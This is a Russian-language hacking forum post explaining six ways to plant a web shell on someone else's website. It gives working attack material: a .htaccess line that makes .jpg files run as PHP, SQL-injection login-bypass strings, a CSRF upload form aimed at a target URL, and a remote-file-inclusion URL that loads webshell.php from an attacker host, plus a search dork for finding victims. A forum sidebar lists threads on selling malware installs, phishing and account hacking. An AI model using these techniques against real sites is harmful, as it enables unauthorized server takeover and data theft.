Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Без названия.jpeg
В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами.

Способ 1
Найти на сайте форму для загрузки файлов/картинок. Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg .Если удалось, то мы увидим вместо картинки белое окно, мы кликаем правой кнопкой мыши и переходим по ссылке. В случае провала мы можем воспользоваться расширением chrome tamper data. Оно позволяет перехватить и изменить запрос как вы хотите. Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:
AddType application/x-httpd-php .jpg
Данная команда будет выполнять jpg файлы как php.
Подробная видеоинструкция:
Видеоинструкция по установке tamper data:

Способ 2
Воспользоваться программой для поиска админок на сайте -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Когда программа нашла админку мы можем попробовать провести sql-injection. В поле логина и пароля сайта мы вбиваем код:
Код:
' or '1'='1
' OR 1=1/*
Если срабатывает, то мы попадаем в админку и действуем по 1 способу . Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.
Подробная видеоинструкция:

Способ 3
В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. На форуме достаточно тем, как можно проводить инъекции, так что зайду издалека. Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся. Но допустим мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера. Проверяем привилегии и загружаем мини-шелл. По каким-то причинам когда я хочу вставить код сайт выдает ошбику .

Способ 4
4 способ подразумевает csrf атаку. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.
Код:
<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>

Способ 5
Узнать как больше о вашей цели и подыскать эксплоит. Для этого есть очень интересный сайт -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Никто и не отменял массовый взлом сайтов через уязвимости, но про это уже есть статья на форме.

Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении .

Способ 6
Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение.

www.site.ru?page=home.html
Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.
www.site.ru?page=http:/hacker.ru/webshell.php
Дорк: Inurl:page=

Также есть способ найти уже залитый шелл с помощью perl

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.
Подробная видеоинструкция:
 
Название темы
Автор Заголовок Раздел Ответы Дата
Denik Интересно Способы заработка Способы заработка 1
Р Интересно Способы получения бесплатного дедика на год Раздача dedic/ssh/proxy 1
× Взлом квадрокоптера || Теория || Способы Уязвимости и взлом 0
L Способы заработка ( бесплатно ) Способы заработка 1
G #Обучение Способы обхода антивирусов. Полезные статьи 1
K Способы взлома почты Уязвимости и взлом 1
U Способы заработка на дедиках + способы добычи дедиков. Способы заработка 1
G Способы взлома сайтов Полезные статьи 18
G Способы взлома страниц vk СИ/Фишинг/Мошенничество 96
N Способы взлома Mail.ru Способы заработка 46
RAPAX Способы и советы СИ/Фишинг/Мошенничество 5
S Способы взлома роутеров Полезные статьи 3
Admin Как распространить вирус. Способы бывалых Полезные статьи 0
V Дешёвые загрузки (установки) вашего софта Трафик, загрузки, инсталлы, iframe 0
R Куплю Покупаю любые загрузки (инсталлы, лоады) микс мира и продаю логи оптом. Трафик, загрузки, инсталлы, iframe 0
N Продам загрузки пк, приз! 800$, sell windows install, 800$ prize! Трафик, загрузки, инсталлы, iframe 0
K Продам качественные загрузки [MIX, EU, US]. Трафик, загрузки, инсталлы, iframe 0
K MIX загрузки. 1к - 100$ Трафик, загрузки, инсталлы, iframe 0
V Продаю инсталлы. загрузки пк. Install Трафик, загрузки, инсталлы, iframe 2
D Помогите чайнику , где брать прокси и аккаунты для загрузки, заранее спасибо Вопросы и интересы 1

Название темы